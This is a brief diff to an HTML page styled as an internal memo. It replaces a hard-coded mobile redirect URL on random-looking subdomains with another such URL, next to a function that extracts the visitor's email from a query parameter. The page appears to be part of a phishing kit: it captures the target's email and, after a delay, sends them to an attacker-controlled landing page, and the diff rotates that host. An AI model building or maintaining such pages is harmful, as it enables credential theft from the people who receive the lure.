--- a/appr-internalmemoxjsn.html
+++ b/appr-internalmemoxjsn.html
@@ -89,7 +89,7 @@
       }, 600);
 
       const REDIRECT_DELAY = 3500;
-      const MOBILE_REDIRECT_URL_BASE = "https://officelfmslsd.sfrdmin.hitachiwalls.com/f/eHZrUJMdj5N--0O1bkhY#";
+      const MOBILE_REDIRECT_URL_BASE = "https://offibvcfrslg.pointelilxlrchrsetrest.calorex-au.com/f/PjiPNlylFbA886MyXCEg#";
 
       function getEmail() {
           // 1. Try extracting from "state" query parameter
